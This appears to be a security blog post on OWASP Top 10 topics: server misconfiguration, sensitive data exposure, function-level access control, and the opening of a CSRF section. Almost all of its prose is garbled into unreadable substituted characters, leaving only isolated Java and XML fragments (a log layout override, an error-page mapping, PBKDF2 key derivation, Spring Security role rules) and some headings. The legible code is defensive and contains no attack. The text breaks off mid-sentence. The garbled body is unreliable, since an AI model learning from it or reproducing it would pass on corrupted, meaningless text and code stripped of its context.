>JII@>ODJI NOMDIB <I? OC@ K<NNRJM? <O &+#, G@Q@G, ?JIÔ <>ODQ<O@ OCDN G@Q@G JI KMJ?P>ODJI AJM OC@ AM<H@RJMF JM <O
G@<NO AJM OC@ >G<NN OC<O GJBN OCDN DIAJMH<ODJI.
)<NO =PO IJO G@<NO, DA TJP NOJM@ TJPM GJBN DI < ADG@, TJP HPNO KMJO@>O OCDN ADG@ RDOC <KKMJKMD<O@ <>>@NN MDBCON. &A TJP
C<Q@ <M>CDQDIB H@>C<IDNH AJM TJPM GJBN, H<F@ NPM@ OC@ GJ><ODJI JA OC@ <M>CDQ@? GJBN C<N OC@ N<H@
<>>@NN MDBCO M@NOMD>ODJI.
0O<>F OM<>@N
1C@ NO<>F OM<>@N <M@ Q@MT PN@APG OJ PI?@MNO<I? < =PB <I? LPD>FGT ADS DO.
&O DN <GNJ < BJG? HDI@ AJM F@M. %@ >C OCDM?-K<MOT AM<H@RJMFN TJP <M@ PNDIB NDHKGT RDOC OC@
K<>F<B@ I<H@N. %@ >G<NN I<H@N JM OC@ GDI@ JA >J?@.
1CDN FDI? JA DIAJMH<ODJI >PMDOT CJG@N JI TJPM <KKGD><ODJI. "Q@I DA TJPM JRI >J?@ DN Q@MT
N@>PM@, DO >PM@ AM<H@RJMFN. 0J ?JIÔ =MF OM<>@N DI GJBN JI KMJ?P>ODJI. )JBBDIB AM<H@RJMFN KMJKJN@ < R<T OJ IJO GJB NO<>F
OM<>@N.
".B. )JB4'^N )<TJPO <=NOM<>O >G<NN C<N OC@ H@OCJ? abstract public boolean ignoresThrowable(); . 6JP
>G<NN JM G<NN OC<O ADO TJP I@@?N <I? JQ@MMD?@ OCDN H@OCJ?:
public class LayoutNoStackTraces extends PatternLayout {
@Override
public boolean ignoresThrowable() {
return false;
}
}
B@ ><M@APG RDOC OC@ ?@A<PGO >JIADBPM<ODJI JA TJPM >JHKJI@ION. ".B. 1JH><O^N ?@A<PGO @MMJM K<B@ ?DNKG<TN OC@ APGG
NO<>F OM<>@ DI < R@= K<B@ RC@I <PBCO @MMJM J>>PMN DI OC@ <KKGD><ODJI. 1J KM@Q@IO OCDN, TJP I@@? OJ ?@ADI@
TJPM JRI @MMJM K<B@ =T <??DIB OC@ AJGGJRDIB DI TJPM R@=.SHG:
<error-page>
<exception-type>java.lang.Throwable</exception-type>
<location>/uncaught_error.jsp</location>
</error-page>
&A TJP <M@ @SKJNDIB R@= N@MQD>@N, =@ ><M@APG RDOC OC@ DIAJMH<ODJI TJPM R@= N@MQD>@ NO<>F ><GGT N@I?.
0JH@ODH@N, < NO<>F OM<>@ >JIO<DI DIAJMH<ODJI <=JPO TJPM @IQDMJIH@IO.
V 1C@ [2N@M-AB@IO\ %11- C@<?@M BDQ@N DIAJMH<ODJI JI OC@ >GD@IO OC<O C<N B@I@M<O@? OC@ M@LP@NO (R@=
=MJRN@M, R@= N@MQD>@ >GD@IOY).
V 1C@ [0@MQ@M\ %11- C@<?@M BDQ@N DIAJMH<ODJI JI OC@ N@MQ@M OC<O C<N B@I@M<O@? OC@ M@NKJIN@ (R@= N@MQ@M,
<KKGD><ODJI N@MQ@MY).
1C@ DIAJMH<ODJI PNP<GGT DI>GP?@ OC@ I<H@, OC@ Q@MNDJI, NJH@ODH@N @Q@I OC@ PI?@MGTDIB JK@M<ODIB NTNO@HY
,=QDJPNGT, RDOC OCDN FDI? JA DIAJMH<ODJI, DO DN @<ND@M AJM F@M OJ ADI? QPGI@M<=DGDOD@N JI TJPM <KKGD><ODJI.
6JP >JIADBPM@ TJPM >JHKJI@ION NJ OC<O OC@T N@I? RMJIB JM A<F@ DIAJMH<ODJI. & M@>JHH@I? TJP <GR<TN
N@I? < KP=GD> DIAJMH<ODJI GDF@ TJPM ?JH<DI I<H@ DI OC@N@ C@<?@MN. ,M, TJP >C@/2.4.1
+JO@ OC<O J=APN><ODIB OC@ N@MQ@M =<II@M NOMDIB DN IJO 100% @AAD>D@IO <B<DINO %11- ADIB@MKMDIODIB OJJGN, OCJPBC.
&IAJMH<ODJI <=JPO OC@ N@MQ@M DN IJO JIGT DI %11- C@<?@MN. ,I < ?@A<PGO DINO<GG<ODJI JA TJPM R@= N@MQ@M, DA TJP <M@
OMTDIB OJ B@O < M@NJPM>@ OC<O ?J@N IJO @SDNO, TJP H<T C<Q@ DI OC@ M@NKJIN@ < K<B@ RDOC < ?@A<PGO %11- 404 @MMJM
H@NN<B@ <I? < =@<PODAPG AJJO@M >JIO<DIDIB <GG OC@ DIAJMH<ODJI TJP <M@ OMTDIB OJ CD?@ DI OC@ %%1- C@<?@M. 0J ?JIÔ
AJMB@O OJ KMJQD?@ TJPM JRI @MMJM K<B@ AJM @<>C %11- NO<OPN >J?@.
'<Q< /PIODH@ "IQDMJIH@IO
1C@ ?@A<PGO DINO<GG<ODJI JA OC@ '/" ?J@N IJO >JIO<DI N<HKG@N NJ DO DN M@<?T AJM KMJ?P>ODJI.
,I@ @S>@KODJI OCJPBC: C<IB@ OC@ ?@A<PGO K<NNRJM? JA OC@ KMJQD?@? A OMPNO NOJM@ (><>@MON) @Q@I DA TJP ?JIÔ
KG<ODJI N@MQ@M, N@MQG@O >JIO<DI@M, R@= N@MQ@M, ?<O<=<N@, KJMO<GY)
-MJO@>O OC@ N@MQ@MN >JIADBPM<ODJI
1C@ >JIO@IO JA >JIADBPM<ODJI ADG@N DN N@INDODQ@ <I? NCJPG? IJO =@ @SKJN@? OJ PI<POCJMDU@? K@MNJIN. %@I>@, GDF@
OC@ GJB ADG@N, TJP HPNO N@O <KKMJKMD<O@ <>>@NN M@NOMD>ODJIN JI OC@ >JIADBPM<ODJI ADG@N. ,IGT OC@ <KKGD><ODJI <>>JPIO
NCJPG? =@ <POCJMDU@? OJ QD@R <I? HJ?DAT OC@ >JIADBPM<ODJI ADG@N.
!@G@O@ N<HKG@N <KKGD><ODJIN
0@MQ@MN <M@ JAO@I KMJQD?@? RDOC N<HKG@N. 1C@T <M@ PN@APG ?PMDIB ?@Q@GJKH@IO KC<N@ OJ NO<MO PNDIB < I@R
>JHKJI@IO. BPO OC@T <M@ IJO C<M?@I@? AJM KMJ?P>ODJI <I? OCPN =@>JH@ =<>F?JJMN AJM <OO<>F@MN.
!@G@O@ <GG N<HKG@ <KKGD><ODJIN, >JIADBPM<ODJI ADG@N, <>>JPIONY
/@QD@R ?@A<PGO >JIADBPM<ODJI
&HH@?D<O@GT <AO@M DINO<GG<ODJI, TJP ><PN@ OC@T <M@ KMJQD?@? RDOC N<HKG@N <I? < NDHKG@
?@A<PGO >JIADBPM<ODJI.
,I KMJ?P>ODJI, TJP HPNO ?@G@O@ OC@N@ N<HKG@N DHH@?D<O@GT <AO@M DINO<GG<ODJI. 1C@T >JIO<DI N@>PMDOT DNNP@N
OC<O >F ?JJM OJ K@I@OM<O@ TJPM NTNO@H.
6JP HPNO <GNJ M@QD@R OCDN ?@A<PGO >JIADBPM<ODJI DI ?@O<DGN OJ @INPM@ DO ADON TJPM I@@?N. /@HJQ@ <GG PII@>@NN<MT
M@NJPM>@N.
4C@I KJNND=G@, ?@G@O@ ?@A<PGO <?HDIDNOM<ODJI <>>JPION <I? >M@<O@ I@R JI@N. ,OC@MRDN@, >C<IB@ OC@ ?@A<PGO
K<NNRJM?N.
,K@M<ODIB NTNO@H
A>>JPION
-MJO@>O OC@ NPK@M PN@M (MJJO/<?HDIDNOM<OJM) <>>JPIO RDOC < NOMJIB K<NNRJM?. !JIÔ PN@ OCDN NPK@M PN@M <>>JPIO OJ
NO<MO < N@MQD>@ PIG@NN DO DN M@LPDM@? =T OCDN N@MQD>@. #JM @S<HKG@, OJ NO<MO AK<>C@ %11-! N@MQ@M JI M@N@MQ@? KJMO
80 JM 443, TJP HPNO PN@ MJJO PN@M. /@A@M OJ N@>ODJI [0@MQ@MN/AK<>C@\ OJ N@@ CJR OJ >JIADBPM@ AK<>C@ DI OC<O
><N@.
M@<O@ <O@? <>>JPIO AJM @<>C N@MQD>@ (<KKGD><ODJI N@MQ@M, R@= N@MQ@M, ?<O<=<N@Y). 1C<O <>>JPIO RDGG
=@ PN@? OJ NO<MO <I? NOJK OC<O N@MQD>@ <I? RJIÔ C<Q@ PN@G@NN MDBCON JI JOC@M AJG?@MN, <>>JPION, <KKGD><ODJIN JM
N@MQD>@N. ,IGT OC<O <>>JPIO RDGG C<Q@ <>>@NN OJ OC@ >JIADBPM<ODJI <I? OC@ GJBN JA DON N@MQ@M.
0@MQD>@N
!@K@I?DIB JI OC@ JK@M<ODIB NTNO@H, TJP RDGG C<Q@ NJH@ N@MQD>@N OC<O RDGG =@ <POJH<OD><GGT NO<MO@?. 0OJK OC@
N@MQD>@N TJP RJIÔ PN@ <I? M@HJQ@ OC@H AMJH OC@ GDNO JA <POJ-NO<MO@? N@MQD>@N.
B@ ><M@APG RDOC OC@ JK@I KJMON. 1C@T ><II@? =T F@M <I? PN@? OJ K@I@OM<O@ TJPM NTNO@H. GJN@
OC@ KJMON TJP RJIÔ PN@. &I NJH@ ><N@N, OC@T >@. 4C@I TJP
?@<>ODQ<O@ < N@MQD>@, ?JIÔ AJMB@O OJ >GJN@ OC@ KJMON PN@? =T OC<O N@MQD>@ DA <IT.
-@I@OM<ODJI O@NO
1J @INPM@ <GG >JHKJI@ION <M@ KMJK@MGT >JIADBPM@?, DA N@>PMDOT M@<GGT H<OO@MN <I? DA TJP C<Q@ ODH@ <I? HJI@T AJM
OC<O, NP=HDO TJPM @IQDMJIH@IO OJ < APGG K@I@OM<ODJI O@NO.
A K@I@OM<ODJI O@NO >JINDNON DI >JGG@>ODIB DIAJMH<ODJI <=JPO OC@ NTNO@H PI?@M O@NO GDF@ OC@ ,0 I<H@ <I? Q@MNDJI,
OC@ JK@I KJMON, OC@ I<H@ <I? Q@MNDJI JA NO<MO@? N@MQD>@N (R@= N@MQ@M, <KKGD><ODJI N@MQ@MY), NPKKJMO@? 00)
Q@MNDJIN <I? <>>@KO<=G@ >DKC@M NPDO@NY 1C@I, <AO@M <I<GTNDN, OC@ O@NO@M RDGG OMT OJ @SKGJDO OC@ >JGG@>O@? DIAJMH<ODJI
OJ K@I@OM<O@ OC@ NTNO@H PNDIB <KKMJKMD<O@ QPGI@M<=DGDOD@N.
!@N>MDKODJI
4@ C<Q@ N@@I DI OC@ KM@QDJPN <MOD>G@N OC<O @? <OO<>F@M >@KO ?<O< DI OM<INDO (@.B. JI
< KP=GD> 4DAD CJONKJO) JM C<Q@ <>>@NN OJ ?<O< NOJM@? DI TJPM ?<O<=<N@ (@.B. PNDIB 0.) DIE@>ODJI). &A OC@ NOJG@I
DIAJMH<ODJI DN N@INDODQ@ (K<NNRJM?, >M@?DO ><M? IPH=@M, K@MNJI<G ?<O<Y), DO HPNO C<Q@ =@@I @I>MTKO@?.
"S<HKG@N
!<O< DI OM<INDO
*T A<QJMDO@ M@NO<PM<IO KMJQD?@ < AM@@ RDAD <>>@NN KJDIO. B@OR@@I OC@ <KK@ODU@M <I? OC@ H<DI H@<G, & R<IO OJ >C@>F
DA HT >M@?DO ><M? RDGG =@ <>>@KO@?. & BJ OJ HT =<IF^N R@=NDO@, @IO@M HT GJBDI <I? K<NNRJM?. 4@GG, &^H NPM@ TJP
M@H@H=@M HT =<IF^N R@=NDO@ ?J IJO PN@ < N@>PM@ >JII@>ODJI. AI <OO<>F@M JI OC@ I@SO O<=G@ DIO@M>@KON OC@ I@ORJMF
OM<AAD> <I? NO@<GN HT N@NNDJI >JJFD@. 6JP FIJR OC@ @I? JA OC@ NOJMTY &A TJP ?JIÔ, TJP HDNN@? HT <MOD>G@ <=JPO
[BMJF@I APOC@IOD><ODJI <I? 0@NNDJI *<I<B@H@IO (COOK://=GJB.DKKJI.AM/2013/10/21/JR<NK-OJK-10-<2/)\
!<O< <O M@NO
2NDIB 0.) &IE@>ODJI (COOK://=GJB.DKKJI.AM/2013/10/11/JR<NK-OJK-10-<1/), F@M >M@?@IOD<GN
JA <GG >GD@ION JA HT =<IF. ,A >JPMN@, OC@ K<NNRJM?N <M@ DI >G@<M O@SOY
+JO@ OC<O OCDN N>@I<MDJ DN <GNJ <KKGD><=G@ RDOC F. &A N@INDODQ@ ?<O< <M@ IJO @I>MTKO@?, OC@T <M@
<>>@NND=G@ OJ OC@ ?<O<=<N@ <?HDIDNOM<OJM.
*DODB<ODJIN
AQJD? NOJMDIB N@INDODQ@ ?<O<
0OJM@ N@INDODQ@ ?<O< JIGT RC@I DO DN <=NJGPO@GT I@>@NN<MT. +@Q@M NOJM@ N@INDODQ@ ?<O< DI GJB ADG@N.
AN NJJI <N OC@ N@INDODQ@ ?<O< DN IJO I@>@NN<MT <ITHJM@, ?@G@O@ DO.
+JO@: NJH@ N@INDODQ@ ?<O< HPNO I@Q@M =@ NOJM@?. ".B. DA TJPM <KKGD><ODJI KMJ>@NN@N >M@?DO/?@=DO ><M? ?<O<,
<>>JM?DIB OJ -&-!00, TJP HPNO I@Q@M F@@K <IT OM<>@ JA OC@ 33 IPH=@M, OC@ 3/4 ?DBDON TJP RDGG PNP<GGT ADI?
=@CDI? OC@ ><M?.
-MJO@>O N@INDODQ@ ?<O<
&I BMJF@I APOC@IOD><ODJI <I? 0@NNDJI *<I<B@H@IO (COOK://=GJB.DKKJI.AM/2013/10/21/JR<NK-OJK-10-<2/), R@ C<Q@
<GM@<?T ?DN>PNN@? CJR OJ KMJO@>O NK@>DAD> N@INDODQ@ ?<O< GDF@ >M@?@IOD<GN DI OM<INDO <I? <O M@NO. 1C@ N<H@
HDODB<ODJIN >MTKO <GG @S>C<IB@N >JIO<DIDIB N@INDODQ@ ?<O< ?PMDIB OM<INDO. 1C@ @I>MTKODJI >PMDOT "I>MTKODJI AJM 0,A- H@NN<B@N).
/@B<M?DIB OC@ OM<INKJMO, >CJJN@ KMJK@MGT OC@ Q@MNDJI JA 00) <I? OC@ >DKC@M NPDO@N OJ H<F@ NPM@ TJPM N@INDODQ@
?<O< RJIÔ =@ ?@>MTKO@? JI OC@ RDM@. #JM OC@ ?@O<DGN, C<Q@ < GJJF JI BMJF@I APOC@IOD><ODJI <I? 0@NNDJI
*<I<B@H@IO (COOK://=GJB.DKKJI.AM/2013/10/21/JR<NK-OJK-10-<2/).
OWASP Top 10 A6 Sensitive Data Exposure
/@B<M?DIB 40-0@>PMDOT, A"0-256 DN M@>JHH@I?@? AJM ?<O< @I>MTKODJI, 3!"0 <I? NCJMO@M A"0 F@TN <M@ R@<F.
#JM F@T RM<KKDIB, /0A RDOC ,A"- K<??DIB DN KM@A@M<=G@ =@><PN@ OC@ JOC@M >CJD>@, /0A 1.5 DN FIJRI OJ C<Q@
QPGI@M<=DGDOD@N. /0A F@TN JA <O G@<NO 2048 =DON DN M@>JHH@I?@?.
1DK: 1J PN@ A"0 256 JM /0A 2048=DON F@TN, TJP RDGG I@@? OJ PKBM<?@ TJPM '/" RDOC '" PIGDHDO@? NOM@IBOC KJGD>T
ADG@N.
AO M@NO
B@ND?@N OC@ K<NNRJM?N OJ <>>@NN TJPM R@= <KKGD><ODJI, TJP >JIND?@M N@INDODQ@
@IJPBC OJ KMJO@>O OC@H DI TJPM ?<O<=<N@ GDF@ >M@?DO/?@=DO ><M? ?<O<, H@?D><G ?<O<, ADID<G DIAJMH<ODJIY
&A TJP ?JIÔ I@@? OJ M@OMD@Q@ OC@N@ N@INDODQ@ ?<O< DI OC@ >G@<M, PN@ -B(!#2 H@>C<IDNH OJ KMJO@>O OC@H GDF@
@SKG<DI DI BMJF@I APOC@IOD><ODJI <I? 0@NNDJI *<I<B@H@IO (COOK://=GJB.DKKJI.AM/2013/10/21/JR<NK-OJK-10-<2/).
,OC@MRDN@, TJP RDGG I@@? < 2-R<T @I>MTKODJI H@>C<IDNH.
1C@ @<ND@NO R<T DN OJ PN@ < N@>M@O F@T NOJM@? DI < N@>PM@ F@TNOJM@ OJ @I>MTKO <I? ?@>MTKO OC@ N@INDODQ@ ?<O<. &
M@>JHH@I? OCDN JKODJI OJ @I>MTKO N@INDODQ@ ?<O< NOJM@? DI OC@ ?<O<=<N@.
,A >JPMN@, JIGT TJPM <KKGD><ODJI NCJPG? C<Q@ <>>@NN OJ TJPM ?@>MTKODJI F@T. &A TJP PN@ TJPM ?<O<=<N@ OJ @I>MTKO
<I? ?@>MTKO OC@ N@INDODQ@ ?<O<, OC@ @I>MTKO@? ?<O< RDGG =@ <POJH<OD><GGT ?@>MTKO@? <AO@M < 0.) DIE@>ODJI <OO<>F. &A
TJPM !BA C<N <>>@NN OJ OC@ ?@>MTKODJI F@T, C@ >MTKO <IT N@INDODQ@ ?<O< DI TJPM ?<O<=<N@.
)<NO =PO IJO G@<NO, TJP NCJPG? PN@ ?DAA@M@IO F@TN AJM ?DAA@M@IO KPMKJN@N. ".B. OC@ F@T PN@? OJ KMJO@>O OC@ >M@?DO
><M? ?<O< NCJPG? IJO =@ PN@? OJ <GNJ KMJO@>O OC@ ADID<G DIAJMH<ODJI. &A JI@ ?@>MTKODJI F@T DN >JHKMJHDN@?, TJPM
N@INDODQ@ ?<O< RJIÔ =@ OJO<GGT @SKJN@?.
,=QDJPNGT, RDOC OC<O JKODJI, TJP RDGG C<Q@ OJ KMJO@>O OC@ F@TNOJM@ K<NNRJM? <I? OC@ F@T K<NNRJM? DA <ITY
*JM@JQ@M, TJP H<T I@@? OJ KMJO@>O JOC@M >JIADBPM<ODJI ?<O< GDF@ OC@ K<NNRJM? OJ <>>@NN OC@ ?<O<=<N@.
#JM OC@N@ >JIADBPM<ODJI ?<O< <I? OC@ K<NNRJM? JA OC@ F@TNOJM@, & M@>JHH@I? <IJOC@M @I>MTKODJI H@>C<IDNH,
=<N@? JI < H<>CDI@ F@T, DINO@<? JA PNDIB < NC<M@? F@T NOJM@? DI < F@TNOJM@.
1C@ KMDI>DKG@ DN LPDO@ NDHKG@:
1. 1<F@ 3/4 DIAJMH<ODJI <NNJ>D<O@? OJ OC@ CJNO H<>CDI@ <I? OC<O RJIÔ =@ >C<IB@? (@.B. &- <??M@NN, CJNO I<H@,
*A <??M@NN, PN@M.I<H@ JM PN@M.CJH@ NTNO@H KMJK@MOD@N, C<M? ?DNF &! JM -2 &! DA <>>@NND=G@, ,0 I<H@
(RDOCJPO Q@MNDJI), ,0 GD>@I>@ IPH=@M DA <>>@NND=G@Y).
byte[] part1 = System.getProperty("user.home").getBytes("UTF-8");
byte[] part2 = InetAddress.getLocalHost().getAddress();
byte[] part3 = System.getProperty("user.name").getBytes("UTF-8");
byte[] part4 = InetAddress.getLocalHost().getHostName().getBytes("UTF-8");
2. $@I@M<O@ < C<NC RDOC OC@ N@G@>O@? Q<GP@N
MessageDigest md = MessageDigest.getInstance("SHA-256");
md.update(part1);
md.update(part2);
md.update(part3);
md.update(part4);
byte[] passwordAsByteArray = md.digest();
3. $@I@M<O@ < M<I?JH Q<GP@
byte[] salt = SecureRandom.getInstance("SHA1PRNG", "SUN").generateSeed(32);
4. $@I@M<O@ < N@>M@O F@T PNDIB -B(!#2 H@>C<IDNH RDOC OC@ C<NC <N K<NNRJM? <I? OC@ M<I?JH Q<GP@ <N N<GO.
1C@ IPH=@M JA DO@M<ODJIN TJP <KKGT DN PK OJ TJP.
SecretKeyFactory skf = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1", "SunJCE");
ByteBuffer bb = ByteBuffer.wrap(passwordAsByteArray);
byte[] passwordAsCharArray = Charset.forName("UTF-8").decode(bb).array();
SecretKey secretKey = skf.generateSecret(new PBEKeySpec(passwordAsCharArray, salt, 10000,
256));
5. "I>MTKO OC@ N@INDODQ@ ?<O< <I? NOJM@ OC@ @I>MTKO@? ?<O< DI OC@ >JIADBPM<ODJI ADG@ <I? NOJM@ OC@ B@I@M<O@? N<GO
<ITRC@M@ (OC@ N<GO DN IJO < N@INDODQ@ ?<O<).
B@ND?@N OC@ <=DGDOT OJ @I>MTKO F@TNOJM@ K<NNRJM?, OC@ H<DI <?Q<IO<B@ JA OCDN H@>C<IDNH DN, DA TJP C<Q@ N@Q@M<G
DINO@N JA TJPM <KKGD><ODJI, OC@ @I>MTKODJI F@T RDGG =@ ?DAA@M@IO JI @<>C DINO@. 0J OC@ >JIADBPM<ODJI ADG@N RDGG
=@ ?DAA@M@IO @Q@I DA OC@T >JIO<DI @S<>OGT OC@ N<H@ >JIADBPM<ODJI.
,A >JPMN@, TJP RDGG C<Q@ OJ HJ?DAT OC@ >JIADBPM<ODJI ADG@ M@<?@M OJ <POJH<OD><GGT B@I@M<O@ OC@ F@T <B<DI (NO@K 1 OJ
4) <I? ?@>MTKO OC@ @I>MTKO@? ?<O< RC@I JI-OC@-AGT. ".B. DA TJP NOJM@ TJPM >JIADBPM<ODJI DI KMJK@MOD@N ADG@N, TJP EPNO
I@@? OJ JQ@MMD?@ OC@ B@O-MJK@MOT H@OCJ?.
1DK: 2NDIB OC@ N<H@ H@>C<IDNH, TJP >JPG? <?? HJM@ @IOMJKT =T B@I@M<ODIB < N<GO AJM @<>C >JIADBPM<ODJI ADG@. AI?
DA TJP I@@? @Q@I HJM@, TJP >C >JIADBPM<ODJI @IOMT OJ =@ @I>MTKO@?Y !JIÔ AJMB@O OJ
NOJM@ OC@ N<GO <O OC@ MDBCO KG<>@. A?? JIADBPM<ODJI ADG@ JM <GJIB RDOC @<>C
@I>MTKO@? ?<O< DA TJP KM@A@M JI@ F@T K@M @IOMT.
,I@ G<NO <?QD>@: ?JIÔ AJMB@O OJ ?@<>ODQ<O@ ><>C@ <I? <POJ->JHKG@ODJI DI N@INDODQ@ K<B@N JA TJPM R@= <KKGD><ODJI.
!@N>MDKODJI
&I < R@= <KKGD><ODJI RDOC ?DAA@M@IO PN@M MJG@N, <POC@IOD><ODJI DN IJO @IJPBC. "<>C M@LP@NO HPNO =@ >JIOMJGG@?
<B<DINO PN@M^N MJG@ OJ @INPM@ OC@ PN@M DN <POCJMDU@? OJ PN@ OC@ M@LP@NO@? API>ODJI JM <>>@NN OC@ M@LP@NO@? K<B@.
"S<HKG@N
,I HT =<IF^N R@=NDO@, OC@ >G@MF C<N < GDIF DI CDN I<QDB<ODJI =<M OJ H<I<B@ OC@ >GD@IO <>>JPION. 1C@ >GD@IO ><IÔ
N@@ OC<O GDIF =@><PN@ >GD@ION <M@ IJO <GGJR@? OJ <>>@NN OCDN N@>ODJI. BPO OC@ DO@H DI OC@ H@IP @SDNON DI OC@ >J?@, DO
DN NDHKGT CD??@I ?TI<HD><GGT PNDIB < '<Q<N>MDKO API>ODJI. BT <I<GTUDIB OC@ %1*) >J?@, F@M >>JPIO H<I<B@H@IO N@>ODJI. AI? <N OC@ <>>@NN OJ OCDN N@>ODJI DN IJO >JIOMJGG@?, OCPN OC@ <OO<>F@M
>>JPIO ?<O<Y).
*JM@JQ@M, API>ODJIN <Q<DG<=G@ DI OC<O <>>JPIO H<I<B@H@IO N@>ODJI AJM >G@MFN <M@ IJO >JIOMJGG@? @DOC@M. 1C@
<OO<>F@M >>JPIO. AI? CJK@APGGT, OC@ <OO<>F@M^N <>ODJIN <M@ IJO GJBB@?.
*DODB<ODJIN
JIOMJG <>>@NN
6JP I@@? OJ =@ NPM@ <>>@NN OJ <GG K<B@N <I? API>ODJIN M@LPDMDIB <POC@IOD><ODJI <I? NK@>DAD> <POCJMDU<ODJI DN
>JIOMJGG@?. 1J NDHKGDAT <I? @IAJM>@ N@>PMDOT, TJPM <>>@NN >JIOMJG H@>C<IDNH NCJPG? =@ >@IOM<GDU@? <I? MJG@-
=<N@?. &O DN <GNJ CDBCGT M@>JHH@I?@? OJ <GR<TN <KKGT < [?@IT-=T-?@A<PGO\ MPG@, D.@. @SKGD>DOGT ?@ADI@ RC<O DN <GGJR@?
<I? ?DN<GGJR @Q@MTOCDIB @GN@.
6JP >CD@Q@ OCDN BJ<G. 0JH@ OCDM?-K<MOT AM<H@RJMFN <GNJ KMJQD?@ A-& AJM
>@IOM<GDU@? <I? MJG@-=<N@? <POC@IOD><ODJI <I? <>>@NN >JIOMJG.
(COOK://=GJB.DKKJI.AM/RK->JIO@IO/PKGJ<?N/2013/
11/<POCJMDU<ODJI.KIB)
NJPM>@: SF>?.>JH
OWASP Top 10 A7 Missing Function Level Access Control
6JP I@@? OJ ADMNO D?@IODAT OC@ ?DAA@M@IO MJG@N <Q<DG<=G@ JI TJPM R@= NDO@. ".B. TJP ><O@? PN@MN RDOC IJ <??DODJI<G MDBCON, OC@ *A+A$"/ MJG@ OJ H<I<B@ PN@MN <I? OC@ A!*&+ MJG@ RDOC
<?HDIDNOM<ODJI KMDQDG@B@N.
4C@I KJNND=G@, JMB<IDU@ TJPM R@=NDO@ <>>JM?DIB OJ OC@N@ MJG@N:
home.xhtml
login.xhtml
access_denied.xhtml
/secure
|_ home.xhtml
|_ /user
|_ accounts.xhtml
|_ account_details.xhtml
|_ contact_my_clerk.xhtml
|_ ...
|_ /mgmt
|_ users.xhtml
|_ messages.xhtml
|_ ...
|_ /admin
|_ managers.xhtml
|_ monitoring.xhtml
|_ ...
1C@I, TJP C<Q@ OJ KMJK@MGT >JIADBPM@ TJPM KM@A@MM@? N@NNDJI H<I<B@H@IO AM<H@RJMF.
&A OC@ M@LP@NO@? 2/) M@LPDM@N <POC@IOD><ODJI, OC@ AM<H@RJMF NCJPG? M@?DM@>O PI<POC@IOD><O@? PN@MN OJ OC@ GJBDI
K<B@. &A OC@ M@LP@NO@? 2/) M@LPDM@N < NK@>DAD> MJG@, OC@ AM<H@RJMF NCJPG? M@?DM@>O OJ >@NN ?@ID@?\ @MMJM
K<B@.
4DOC 0KMDIB 0@>PMDOT, OC@ >JIADBPM<ODJI NCJPG? GJJF GDF@ OC@ AJGGJRDIB:
<sec:http auto-config="true" access-denied-page="/access_denied.xhtml">
<sec:form-login login-page="/login.xhtml" default-target-url="/secure/home.xhtml" />
<sec:intercept-url pattern="/login.xhtml*" access="IS_AUTHENTICATED_ANONYMOUSLY" />
<sec:intercept-url pattern="/secure/user/**" access="ROLE_USER,ROLE_MANAGER" />
<sec:intercept-url pattern="/secure/mgmt/**" access="ROLE_MANAGER" />
<sec:intercept-url pattern="/secure/admin/**" access="ROLE_ADMIN" />
<sec:intercept-url pattern="/secure/**" access="ROLE_USER,ROLE_MANAGER,ROLE_ADMIN" />
<sec:session-management invalid-session-url="/login.xhtml" />
</sec:http>
%D?@ PI<POCJMDU@? API>ODJIN
&A PN@MN ?JIÔ FIJR < API>ODJI @SDNON, OC@T RJIÔ =@ O@HKO@? OJ PN@ DO.
4C@I KJNND=G@, JIGT NCJR OC@ API>ODJIN OC@ PN@M >>@NN RDOC DON KMDQDG@B@N. 1CDN R<T, TJP RJIÔ @SKJN@
N@INDODQ@ 2/) OJ KJO@IOD<G <OO<>F@MN. ,A >JPMN@, OC<O H@<IN TJP NCJPG? IJO C<Q@ <ITOCDIB DI OC@ B@I@M<O@? %1*)/
E<Q<N>MDKO >J?@ M@G<O@? OJ OC@N@ CD??@I API>ODJIN. AQJD? %1*) =GJ>FN CD??@I RDOC 00 JM E<Q<N>MDKOY
4DOC TJPM KM@A@MM@? R@= AM<H@RJMF, TJP RDGG ADI? ?DAA@M@IO H@>C<IDNHN OJ ?DNKG<T JM CD?@ F
?@K@I?DIB JI OC@ PN@M^N KMDQDG@B@N.
".B. 0KMDIB 4@=AGJR KMJQD?@N <authorize> , < 0KMDIB 0@>PMDOT O
Links to client functions (also accessible to clerks)
</security:authorize>
<security:authorize ifAllGranted="ROLE_MANAGER" ifNotGranted="ROLE_USER,ROLE_ADMIN">
Links to Management functions (only for clerks)
<security:authorize ifAllGranted="ROLE_ADMIN" ifNotGranted="ROLE_USER,ROLE_MANAGER">
Links to Administration functions (only for administrators)
)JB N@INDODQ@ <>ODJIN
)<NO =PO IJO G@<NO: GJB DI < N@>PM@ KG<>@ <GG N@INDODQ@ <>ODJIN ?JI@ JI TJPM R@=NDO@. &A TJPM R@=NDO@ DN <OO<>F@?,
@Q@I DA OC@ <OO<>F A<DG@? (=@><PN@ OC@ HDODB<ODJIN & KMJKJN@? <M@ <GG <KKGD@? JI TJPM R@=NDO@), DO DN NODGG DIO@M@NODIB
OJ FIJR CJR <I? RC@I TJP R@M@ <OO<>F@? <I? =T RCJ. 1CPN, TJP ><IÔ O<F@ NK@>DAD> <>ODJIN <B<DINO OC@ NJPM>@
JA OC@ <OO<>F (=GJ>FDIB &-, ?@<>ODQ<ODIB <>>JPIO, M@QJFDIB >GD@IO >@MODAD><O@Y) <I? DIQ@NODB<O@ APMOC@M.
AI @Q@I =@OO@M JKODJI RJPG? =@ OJ =@ <G@MO@? RC@I < NPNKD>DJPN <>ODJI DN M@LP@NO@?. #JM @S<HKG@, DA <O@? NDHKG@ PN@M OMD@N OJ <>>@NN < H<I<B@H@IO API>ODJI, JA >JPMN@, OC@ <>>@NN RDGG =@ M@E@>O@? =PO DO H<T
=@ DIO@M@NODIB OJ FIJR OC<O OC@M@ R<N < KJO@IOD<G <OO<>F <OO@HKO.
!@N>MDKODJI
AI <OO<>F@M N@I?N < M@LP@NO OJ < R@=NDO@ TJP <M@ <POC@IOD><O@? JI OJ @S@>PO@ F@MN PNP<GGT PN@ 500 (COOK://=GJB.DKKJI.AM/2013/10/28/JR<NK-OJK-10-<3/) OJ H<F@ TJP JM TJPM =MJRN@M N@I?
OCDN H<GD>DJPN M@LP@NO, =PO H<IT JOC@M AG<RN @SDNO OJ <>CD@Q@ OC@ N<H@ BJ<G.
"S<HKG@N
"Q@MT HJIOC, OJ K<T HT M@IO, & <POC@IOD><O@ JI HT =<IF^N R@=NDO@, OC@I & PN@ OC@ AJGGJRDIB GDIF N<Q@? DI HT
A<QJMDO@N:
